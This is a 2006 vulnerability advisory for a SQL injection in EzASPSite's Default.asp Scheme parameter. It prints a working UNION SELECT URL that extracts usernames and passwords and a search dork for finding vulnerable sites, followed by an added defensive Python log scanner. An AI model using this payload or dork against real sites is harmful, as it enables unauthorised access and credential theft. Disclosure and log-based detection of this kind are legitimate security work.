Source: securityvulns (SECURITYVULNS:DOC:12060)
History: Apr 02, 2006 - 12:00 a.m.

EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.


–Security Report–
Advisory: EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 29/03/06 21:33 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: EzASPSite (http://www.ezaspsite.com)
Version: 2.0 RC3 and prior versions must be affected.
About: Via this method, a remote attacker can inject arbitrary SQL queries
into the Scheme parameter of Default.asp.
Level: Critical

How&Example:
GET -> http://[victim]/[EZASPDir]/Default.asp?Scheme=[SQL]
EXAMPLE ->

http://[victim]/[EZASPDir]/Default.asp?Scheme=-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',
0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1
With this example, a remote attacker can leak the specified users' login
information from the database.
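
For defenders, the request pattern above can be looked for in web server logs. The following is an added example, not part of the original advisory or of EzASPSite: it flags requests to Default.asp whose Scheme value is not a plain integer. It assumes that Scheme is normally a numeric ID and that logs are in an IIS W3C style field order; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in IIS W3C style: date time method uri-stem uri-query status.
# The injected values are shortened stand-ins for the advisory's query, not real traffic.
SAMPLE_LOG = """\
2006-03-30 10:01:12 GET /site/Default.asp Scheme=3 200
2006-03-30 10:01:40 GET /site/Default.asp Scheme=-1+UNION+SELECT+0,password,0+from+tblAuthor+where+Group_ID=1 200
2006-03-30 10:02:05 GET /site/default.asp Scheme=2%20union%20select%201 500
2006-03-30 10:02:30 GET /site/forum.asp Scheme=abc 200
2006-03-30 10:03:00 GET /site/Default.asp page=2 200
2006-03-30 10:03:20 GET /site/Default.asp Scheme=blue 200
"""

SQL_TOKENS = re.compile(r"\b(union|select|from|where)\b|--|;|'", re.IGNORECASE)

def classify_scheme(value):
    """Return None for a plain non-negative integer, otherwise a reason string."""
    if re.fullmatch(r"\d{1,9}", value):   # assumption: Scheme is a numeric ID
        return None
    if SQL_TOKENS.search(value):
        return "sql-tokens"
    return "non-numeric"

def scan(log_text):
    """Return a list of (line number, reason, decoded Scheme value)."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue                      # skip W3C header lines and short lines
        stem, query = fields[3], fields[4]
        if not stem.lower().endswith("/default.asp"):
            continue
        # parse_qs URL-decodes the value, so "+" and "%20" both become spaces.
        for key, values in parse_qs(query, keep_blank_values=True).items():
            if key.lower() != "scheme":   # ASP parameter names are case-insensitive
                continue
            for value in values:
                reason = classify_scheme(value)
                if reason:
                    findings.append((lineno, reason, value))
    return findings

if __name__ == "__main__":
    for lineno, reason, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {reason}: {value[:60]}")
```

The same integer-only check, applied server-side before the value reaches the query, is the corresponding input-validation control.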

Timeline:

  • 29/03/2006: Vulnerability found.
  • 29/03/2006: Contacted vendor, waiting for reply.

Exploit:
http://www.nukedx.com/?getxpl=22

Dorks: "Powered By EzASPSite v2.0 RC3"

Original advisory can be found at: http://www.nukedx.com/?viewdoc=22